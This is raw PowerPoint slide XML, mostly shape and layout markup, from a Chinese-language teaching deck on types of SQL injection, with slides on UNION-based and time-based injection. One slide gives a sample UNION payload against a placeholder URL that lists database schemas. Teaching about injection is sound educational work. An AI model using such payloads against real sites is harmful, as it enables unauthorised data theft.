                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3151F0D8-7E15-9840-AB68-53D75C1236B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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4156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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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err="1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认识SQL注入的不同类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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1625611" y="1563149"/>
            <a:ext cx="6976641" cy="6624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UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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（联合查询注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill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C23BC1-A326-064A-92FE-C8B0FD431769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="5283976" flipH="1">
            <a:off x="805684" y="2733280"/>
            <a:ext cx="379412" cy="381000"/>
            <a:chOff x="3552" y="960"/>
            <a:chExt cx="215" cy="182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FA5EEC6-B242-C14A-B35F-5A14F89779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8" y="960"/>
              <a:ext cx="119" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 212 w 262"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 261 w 262"/>
                <a:gd name="T3" fmla="*/ 316 h 375"/>
                <a:gd name="T4" fmla="*/ 0 w 262"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 212 w 262"/>
                <a:gd name="T7" fmla="*/ 374 h 37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2"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 262 w 262"/>
                <a:gd name="T15" fmla="*/ 375 h 37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2" h="375">
                  <a:moveTo>
                    <a:pt x="212" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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20FEA43C-0851-7845-A28F-CDA60BF16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2" y="960"/>
              <a:ext cx="194" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 426"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 425 w 426"/>
                <a:gd name="T3" fmla="*/ 374 h 375"/>
                <a:gd name="T4" fmla="*/ 213 w 426"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 0 w 426"/>
                <a:gd name="T7" fmla="*/ 374 h 37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26"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 426 w 426"/>
                <a:gd name="T15" fmla="*/ 375 h 37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26" h="375">
                  <a:moveTo>
                    <a:pt x="0" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="425" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRP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9F8D31C5-73A5-C145-ADEE-FA93DC9C4880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625611" y="2630416"/>
            <a:ext cx="7828597" cy="2357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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1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test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1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view?id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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=1 UNION ALL SELECT SCHEMA_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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FROM INFORMATION_SCHEMA.SCHEMATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0"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最快捷的方法，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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查询获取到所有想要的数据，前提是请求返回后能输出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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执行后查询到的所有内容。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B87C20B9-3720-084A-99C1-887A0A51C485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{917ABEC8-EEA6-6E46-897E-7C079B6EB50A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8965769-9C9F-A84B-BBDF-60ABADB5F8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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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8" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BFAA0D6-961A-B849-B82A-3A102C0733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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702B74E8-8EBA-9B45-88D8-021860904BB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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5089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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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err="1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认识SQL注入的不同类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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1671508" y="1586819"/>
            <a:ext cx="6976641" cy="6624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Time-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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（基于时间延迟注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33322F89-AD3E-D24F-89E7-801DF9518D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA563178-EDDA-9349-83A2-3C55C6963C29}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507BA0A5-A363-C341-87D5-9585630C80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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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26" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC6DEF8-3FB5-FB4A-8435-47773DFB31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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
